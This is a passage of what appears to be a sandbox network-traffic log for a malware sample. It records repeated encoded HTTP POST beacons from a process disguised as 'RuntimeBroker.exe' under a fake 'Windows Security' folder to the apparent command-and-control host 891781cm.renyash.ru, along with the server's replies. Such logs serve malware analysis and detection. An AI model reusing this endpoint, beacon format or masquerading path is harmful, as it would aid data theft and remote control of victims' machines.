                                                                                                                          Data Ascii: PU]SZXQTUZTYQXUSX^\_YPR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (!(%^1>&(.?Z''&V.'?0?533Z8<+>T),#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:20.955310106 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:21.211747885 CET802INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:21 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IFNow6ZJhnDc5T%2FRXbDOl9BsMkKxE5Nvda8AoCsL3vaDOsRnsy09aSk7EFoKx4yUP6hJrOTuraOGrqc0yNJqvXYgMfTnw%2ByIpQGg2D6NhEV7o89xiXi8L5pZZ7iTtktooDn7KKBx"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6268bc95f799-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1500&rtt_var=1039&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=428655&cwnd=91&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.449762104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:21.336903095 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:21.693700075 CET1056OUTData Raw: 50 54 5d 56 5a 5b 54 5f 55 5a 54 59 51 59 55 5c 58 5f 5c 54 59 52 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PT]VZ[T_UZTYQYU\X_\TYRR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ),)#(91=5[)('$!9+$Y-0;>4+(S)#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:21.832504034 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:22.097019911 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:22 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJEwZb%2FNxaVavtkxCKbOVHOtQyz4g1EIhi3w7GBuYncQ5GYmZnp8muVY49mDp%2BAhy0k9htAtkVtFHijtEJ7nSGh7rJP4c4GT9B9NJPNg%2Fo1PSU0YPmnV%2FDbN4I6t752uoe0ILa%2Bw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf626e2b344321-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3754&min_rtt=2458&rtt_var=3515&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=113778&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.449763104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:22.228238106 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:22.584150076 CET1056OUTData Raw: 50 51 58 56 5f 59 54 5d 55 5a 54 59 51 52 55 52 58 5a 5c 54 59 50 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQXV_YT]UZTYQRURXZ\TYPRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(Y>4+_2==)X#[0:'$X$"W'38>$](8T(<#^!'^)
                                                                                                                          Jan 1, 2025 04:22:22.681775093 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:22.959959030 CET812INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:22 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfR6vDAKaADqYNj%2BOkYcwWKah0WT5koOQa%2Fpy4%2FVbc0%2Bf7%2BPVk7QPqJ1Fm9QKQn9xTKeh9uXaQCtDeJmgFsHfZx%2FKjzPJrZxskSynh4O0PoXy5aM8Qr%2BJ4Z8am9e1s51AJ7OChyu"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62737d588cad-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4196&min_rtt=1889&rtt_var=5323&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=71747&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.449764104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:23.087948084 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:23.443523884 CET1048OUTData Raw: 55 5e 5d 53 5f 5e 51 59 55 5a 54 59 51 5b 55 5d 58 5e 5c 5e 59 51 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^]S_^QYUZTYQ[U]X^\^YQR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^(-Z4;)Z1>1[)._3*U,'#0.0?'[8+<- ),#^!'^)
                                                                                                                          Jan 1, 2025 04:22:23.533339024 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:23.720546961 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:23 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTDmel0DB%2BO%2FW0cIUPpXLnH0ylv34DNchmHZx4sAtZjh93gO8RVD%2Bl9iQdMaHwVN4ulXBKjHMb2WXlAti6JNI%2BeXZgUAqJsvHvXzW1d%2B0qX8Rr5Ud%2BrtSAHd6Jp4qWqVHGbvsIIS"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6278cb2e7c99-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3808&min_rtt=2042&rtt_var=4298&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=90268&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.449765104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:23.850147009 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:24.214698076 CET1056OUTData Raw: 55 5f 58 54 5f 5a 54 59 55 5a 54 59 51 53 55 5d 58 53 5c 5a 59 52 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_XT_ZTYUZTYQSU]XS\ZYRR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+?"!+$=5[*70'.P-$$?%$<8=?(>=,#^!'^)
                                                                                                                          Jan 1, 2025 04:22:24.303405046 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:24.569931030 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:24 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k7sa0N%2BYYTF6hmn3oAeFFnRtq9t%2B8HdgQPGMOZ7%2FVImYFEeiFD%2FKTvMAoxDfqneeht2WK0Fj52LQouigQO8UhKY9f8fZV2pXdPVTh46S1x2YZwxsDTQKUeZtHRD2uMm1FsVRUhPk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf627d9ca38cbf-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2611&min_rtt=2022&rtt_var=1937&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=216617&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.449766104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:24.695291996 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:25.052920103 CET1056OUTData Raw: 50 53 5d 54 5a 57 54 5e 55 5a 54 59 51 5f 55 53 58 58 5c 5f 59 5c 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PS]TZWT^UZTYQ_USXX\_Y\R_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \?)\ ]&1.>>0&4-';3.U'; [<3)#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:25.147984028 CET25INHTTP/1.1 100 Continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.449767104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:25.293390036 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:25.646780968 CET1780OUTData Raw: 55 51 5d 57 5f 5b 54 5a 55 5a 54 59 51 5c 55 51 58 5d 5c 54 59 52 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQ]W_[TZUZTYQ\UQX]\TYRR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]),- -1.2).+$4*T,$'?-0'_8=;++><#^!'^)
                                                                                                                          Jan 1, 2025 04:22:25.738048077 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:26.032455921 CET951INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:25 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FGK3oOqvrvMBeJYf6R1Jxh8bG8XECiaAGcu168S3eyKm6ABafTrVw4lyLwtXJfM6TsirR6oI6oY8%2F9zJo4z6H08qBFt7DnXhsM1od5A8F0XB8FbsHP5t5m9oRMZnETaWY0ogMPz"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62869ae60f69-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1474&rtt_var=712&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=690960&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 12 33 02 34 07 3f 3d 22 5d 3b 01 01 55 31 01 3e 14 27 20 20 1d 26 2d 25 5e 2e 2b 30 10 2b 3b 01 10 32 3a 00 02 20 57 31 00 26 26 2e 5d 04 1d 26 01 29 03 22 5f 2b 11 07 12 29 1c 2b 04 27 09 38 05 26 24 30 11 24 2d 3e 1f 35 32 27 1f 27 1d 28 1f 2a 2a 27 59 27 2e 3d 0e 34 00 2e 57 0d 12 22 54 26 58 21 11 3d 31 24 55 35 02 3b 11 33 3f 3c 09 27 02 30 56 37 5e 2d 0e 29 2f 3f 00 23 37 21 51 30 3a 09 5e 21 29 3a 03 21 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"34?="];U1>' &-%^.+0+;2: W1&&.]&)"_+)+'8&$0$->52''(**'Y'.=4.W"T&X!=1$U5;3?<'0V7^-)/?#7!Q0:^!):!"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.449768104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:25.415797949 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:25.771636963 CET1056OUTData Raw: 55 5e 58 52 5f 59 54 5e 55 5a 54 59 51 5f 55 52 58 52 5c 5a 59 57 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^XR_YT^UZTYQ_URXR\ZYWRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?#:&>)>7[0'%.832&,'_;='<.T=,#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:25.889003038 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:26.149435043 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:26 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c4SS6cGn5BCZovbdzc5kog6AmpbU2uYCZeR2KPPQW2%2FjxBPY6JL5eN%2FSot47mY1bqflWaR68vVDZHdm1HWz8fTAycD6AXtaZkRwhdVkK1qsG3U2XlvbUWMqkTPB3JS4TBna1u%2BiM"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf628789a35e7e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4643&min_rtt=2238&rtt_var=5649&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=67970&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.449769104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:26.280376911 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:26.631098986 CET1056OUTData Raw: 55 56 5d 51 5a 59 51 5f 55 5a 54 59 51 5f 55 54 58 58 5c 5d 59 50 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UV]QZYQ_UZTYQ_UTXX\]YPR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+>#^%=\)&4:?',2T0/^8-([+;)<#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:26.727880001 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:26.996200085 CET798INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:26 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16bOEWZGFZ7K42JrMJUP4DnguUxsKncYy3W9VS4ObraZ2cQaGlLd2e9BzM2ldDD1pUNtvJvGhA7R0FUPcjspLbr6PgGqgHtzZi5ToRtFNpQOHLT4lfmeGkGqRqqmdBrTsoeCdV3h"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf628ccb5e431f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4305&min_rtt=1758&rtt_var=5754&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=65946&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.449770104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:27.153287888 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:27.506778955 CET1048OUTData Raw: 50 51 5d 50 5a 59 54 5d 55 5a 54 59 51 5b 55 52 58 58 5c 5c 59 53 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQ]PZYT]UZTYQ[URXX\\YSRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?<5!;)%!Z='37.V-'4Y$?>$/?^/-<?(),#^!'^)
                                                                                                                          Jan 1, 2025 04:22:27.606646061 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:27.879118919 CET813INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:27 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
